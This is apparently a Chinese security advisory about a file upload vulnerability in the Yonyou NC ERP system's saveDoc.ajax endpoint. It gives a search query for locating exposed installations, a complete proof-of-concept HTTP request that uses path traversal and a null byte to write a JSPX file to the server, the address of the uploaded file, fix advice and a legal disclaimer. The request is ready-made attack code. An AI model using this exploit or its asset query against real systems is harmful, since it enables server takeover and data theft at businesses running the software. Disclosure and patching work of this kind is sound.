产品介绍

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。

漏洞描述

用友NC 系统 saveDoc.ajax 存在文件上传漏洞，攻击者可通过该漏洞在服务器端写入后门文件，任意执行代码，获取服务器权限，进而控制整个 web 服务器。

资产测绘

app=“用友-UFIDA-NC” && title==“产品登录界面”

漏洞复现

POC：

POST /uapws/saveDoc.ajax?ws=/../../4627716.jspx%00 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 288content=<hi xmlns:hi="http://java.sun.com/JSP/Page"><hi:directive.page import="java.util.*,java.io.*,java.net.*"/><hi:scriptlet>out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); </hi:scriptlet>
</hi>

访问上传文件地址：ip/uapws/4627716.jspx

修复建议

1、升级到安全版本
2、如非必要，禁止公网访问该系统。
3、设置白名单访问。

免责声明

本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。